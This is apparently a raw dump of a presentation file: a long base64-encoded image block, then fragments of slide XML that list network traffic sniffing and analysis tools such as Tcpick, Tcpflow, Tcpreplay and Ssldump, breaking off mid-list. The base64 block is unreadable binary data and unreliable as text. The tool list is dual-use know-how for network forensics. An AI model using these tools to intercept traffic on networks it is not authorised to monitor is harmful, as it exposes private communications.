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data:image/jpeg;base64,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2" name="Picture 6" descr="http://tcpxtract.sourceforge.net/tcpxtract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15000" y="2571750"/>
            <a:ext cx="3117273" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill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00800" y="3714750"/>
            <a:ext cx="1409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66928" y="895350"/>
            <a:ext cx="5486400" cy="3733834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>Tcpick ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://tcpick.sourceforge.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>Tcptrace ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.tcptrace.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>Tcpflow ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.circlemud.org/~jelson/software/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>Tcpreplay ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://tcpreplay.sourceforge.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>Ssldump ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://freshmeat.net/projects/ssldump/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>AIM Sniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
